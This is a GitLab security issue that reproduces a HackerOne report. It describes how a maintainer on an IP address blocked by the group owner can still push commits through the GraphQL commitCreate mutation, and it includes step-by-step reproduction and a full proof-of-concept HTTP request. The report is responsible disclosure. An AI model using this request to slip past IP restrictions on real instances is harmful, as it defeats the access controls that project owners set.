Users on banned IP addresses can still commit to projects

⚠ Please read the process on how to fix security issues before starting to work on the issue. Vulnerabilities must be fixed in a security mirror.

HackerOne report #1914049 by js_noob on 2023-03-21, assigned to GitLab Team:

Report | Attachments | How To Reproduce

Report

Summary

Hello team, as a part of the grp/project security an owner can block certain IP addresses from accessing that group resources (projects,...). However, even if a user is on a blocked IP address he can still commit to projects.

Steps to reproduce

1. Create a grp, project and add a maintainer
2. From the owner navigate to https://gitlab.com/groups/YOUR_GRP/-/edit#js-permissions-settings and add the maintainer IP address under Restrict access by IP address
3. From the maintainer navigate to https://gitlab.com/GRP/PROJECT/-/tree/main and verify the 404
4. From the maintainer send the following request, but change the variables according to your preferences

POST /api/graphql HTTP/2  
Host: gitlab.com  
Cookie: YOUR_COOKIES  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0  
Accept: */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: https://gitlab.com/-/graphql-explorer?_gl=1*1mb1g5a*_ga*MjM3Mzk5MDUzLjE2NzczMjcxMTY.*_ga_ENFH3X7M5Y*MTY3ODk4Mzg2Ni40LjEuMTY3ODk4MzkwNi4wLjAuMA..  
Content-Type: application/json  
X-Csrf-Token: xD3r11jgwirOfA6E1GB1pL9ZEuq8lqQCYcrZo4eSO8xbfvb9kmkI5BmsLqWWtgLw894u3hwjqXeGO4LbPJ_cNg  
Content-Length: 489  
Origin: https://gitlab.com  
Sec-Fetch-Dest: empty  
Sec-Fetch-Mode: cors  
Sec-Fetch-Site: same-origin  
Te: trailers

{"query":"mutation MyMutation {\n  commitCreate(\n    input: {\n      projectPath: \"test645811/project-1\",\n      branch: \"main\",\n      message: \"This is a Commit\",\n      actions: [\n        {\n          action: UPDATE,\n          filePath: \"README.md\",\n          content: \"This is a test content\",\n          encoding: TEXT\n        }\n      ]\n    }\n  ) {\n    commit {\n      author {\n        name\n      }\n    }\n  }\n}\n","variables":null,"operationName":"MyMutation"}  

5. Verify the successful response and from the owner verify the creation of the commit

Video/POC

bandicam_2023-03-21_20-40-59-702.mp4

Impact

Users from banned IP addresses can manage push changes to project where they should be completely blocked from accessing any project that belongs to that group.

Attachments

Warning: Attachments received through HackerOne, please exercise caution!

• bandicam_2023-03-21_20-40-59-702.mp4

How To Reproduce

Please add reproducibility information to this section: